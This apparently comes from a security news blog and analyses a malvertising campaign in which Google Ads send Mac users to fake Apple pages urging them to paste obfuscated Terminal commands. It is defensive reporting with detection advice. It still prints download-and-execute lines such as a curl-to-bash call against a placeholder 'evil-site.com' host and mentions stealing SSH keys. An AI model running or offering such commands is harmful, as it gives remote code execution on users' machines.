Threat Actors Abuse Google Ads to Push Fake Mac Cleaners

Leave a Comment / CyberSecurity, CyberSecurityNews / By
Threat Actors Abuse Google Ads to Push Fake Mac Cleaners

Imagine searching Google for “mac cleaner” or “clear cache macOS,” clicking a shiny sponsored ad, and without writing handing over your Mac keys to attacker.

Cybersecurity researchers have uncovered a fresh campaign abusing Google Ads to redirect users to malicious pages that mimick Apple’s site.

These Mac owners with promise of simple storage fixes, only to execute hidden shell commands that download and run arbitrary  script.

mac cleaner

We dug into active ads, dissected the payloads, and traced the tactics.

Google has been noticed, but the ads persist in some regions. This is not amateur hour; it is sophisticated social engineering paired with obfuscated bash payloads exploiting user trust in Google and Apple branding.

How the Ads Hook Victims

The attack starts innocently: queries like “mac cleaner,” “free up space macOS,” or “check Mac storage” trigger sponsored results from seemingly legit advertisers.

Click through, and you are on a landing page styled like apple.com, complete with fake navigate menus (non-clickable for realism) and urgent prompt like “Check your storage now!” or “Free up disk space fast.”

Two primary landing page flavors dominate:

  • Google Apps Script Pages: Links resolve to trusted domains such as script.google.com or business.google.com but redirect to macro or exec endpoints that host the payload. Examples include long URLs like script.google.com/macros/s/AKfycbzQhmqhKU25-h2eSX09eV2TSXVy_KPdXrE0fMDY4ldvX2xD2-CESEThC4FjAdwF_GjT/exec (with Google ad tracking params like gclid and gad_source).
  • Medium Posts: Newer variants point to fake profiles like profile apple.medium.com, posing as “Official Apple Support.” A prime example: profile-apple.medium.com/free up storage space on mac fbc94c1e1fde. The profile is brand new (hours old, 1 follower), with planted comments boosting credibility, some even mimicking warnings that get buried.

These pages push copy paste instructions into Terminal. Critical warning: Do not run them. They’re pure social engineering, disguised as harmless maintenance.

Payload 1: The Base64-Decoded Downloader (Google Apps Script Variant)

The first payload type masquerades as a “storage cleaner.” Users are told to paste this into Terminal:

On the surface, it looks benign. Here’s the technical teardown:

  • echo “Cleaning macOS Storage…”: Pure theater. Prints a reassuring message to lower defenses. No actual cleaning occurs.
  • echo ‘…’ | base64 -D: The meat. macOS’s base64 command with -D (decode flag) unpacks a hidden string into a live shell command. That ‘…’ is a base64 blob encoding something nasty, like a curl/bash chain. Decoding reveals a downloader that fetch a remote script.
  • echo ‘Installing packages please wait…’: More distraction. Builds false trust while the prior command runs silently.

Full execution flow:

  1. Decode triggers a command like /bin/bash -c “$(curl -fsSL http://evil-site.com/payload.sh)”.
  2. curl -fsSL grabs the script quietly (-f fails silently, -s suppresses progress, -L follows redirects).
  3. bash executes it with full user privileges, no sudo needed, but total shell access granted.

This is textbook remote code execution (RCE). The downloaded script could install adware, keyloggers, or worse. Silent flags prevent pop-ups or error alerts from appearing to the user. We’ve seen this pattern in Linux malware droppers and GitHub supply-chain hacks, both of which are obfuscated to evade scanners.

Payload 2: Nested Command Substitution (Second Google Apps Script Variant)

A close cousin uses deeper nesting for stealth.

Dissection:

  • /bin/bash -c “…”: Invokes bash to eval the quoted string.
  • $(…): Command substitution. Runs the inner command, injects its output as text for execution.
  • echo ‘…’ | base64 -d: Decodes another base64 blob into a URL
  • curl -fsSL $(decoded-url) | bash: Absent in plain view, but that’s the decoded result—downloads and pipes directly to bash.

Why this obfuscation rocks for attackers:

  • Base64 hides the URL from casual inspection.
  • Nesting defeats basic regex filters in sandboxes or ad reviewers.
  • Command sub generates dynamic URLs that rotate per victim.

Equivalent to typing curl evil.com/script | bash unthinkingly. Risks? The script runs with your user’s perms, potentially:

  • Exfiltrating ~/.ssh/id_rsa keys.
  • Installing persistent malware via launchd plists.
  • Adding cron jobs for backdoors.
  • Mining crypto with your CPU/GPU.
  • Enumerating files via find or mdfind for sensitive data.

No visible output thanks to flags. On macOS Ventura/Sonoma, SIP and TCC might limit some actions. However, user-level access is more than enough for chaos.

Medium Variant: Same Poison, Social Proof Twist

The Medium post mirrors the above: identical instructions, fake Apple branding, and comment sections gamed to appear legitimate.

Bots post “This worked great!” while one “skeptic” comment flags malware, but it’s drowned out. Profile age (e.g., 11 hours old) screams fake, but ad spend gets it top placement. Technically identical to Script payloads post-decode. Medium’s lax moderation lets it thrive until reported.

Compromised Ad Accounts: The Supply Chain Angle

Advertisers appear hijacked. Google’s Transparency Center reveal mismatches:

The first advertiser is Nathaniel Josue Rodriguez.
The first advertiser is Nathaniel Josue Rodriguez.
  • Nathaniel Josue Rodriguez (AR03742598973764927489): Legitimate ads for unrelated domains; malvertising slipped in.
  • Aloha Shirt Shop (AR00152784596742701057): Suspicious ad confirmed in the center.

Hackers likely stoled credentials or exploited API keys. Verified accounts lend credibility; Google’s vetting was bypassed via account takeovers. This is malvertising 101: low cost, high reach.

Technical Defenses and Detection

For users:

  • Verify URLs: Hover before clicking. script.google.com/exec? It is a red flag for “cleaners.”
  • Terminal hygiene: Never paste from untrusted sources. Use read p or inspect with xxd.
  • Block outbound curl via Little Snitch or macOS firewall to unknown destinations.
  • Check Activity Monitor for rogue processes post-exposure.
suspicious ad in the Transparency Center.
suspicious ad in the Transparency Center.

Detection signatures:

  • YARA rule snippet for base64 blobs: base64 -D chains with curl/bash.
  • Network: curl -fsSL to short-lived domains (use VirusTotal for IOCs).
  • Endpoint: Look for new launch agents in ~/Library/LaunchAgents.

For Google: Faster takedown via script URL blocklist and ad pre scan for base64 or shell patterns.

Broader Implications

This campaign highlights Google Ads as a persistent vector with 10% of malvertising now targeting Macs, according to recent reports.

Attackers evolve: tomorrow, it’s “AI Mac optimizer” ads. macOS’s Unix roots make bash droppers evergreen, but XProtect lags on obfuscated payloads.

site: moccasin-seal-164327.hostingersite.com

Related Posts

Technitium: Self-Hosted DNS Server for Enhanced Privacy and Security
Generative Application Firewall

Leave a Comment

Your email address will not be published. Required fields are marked *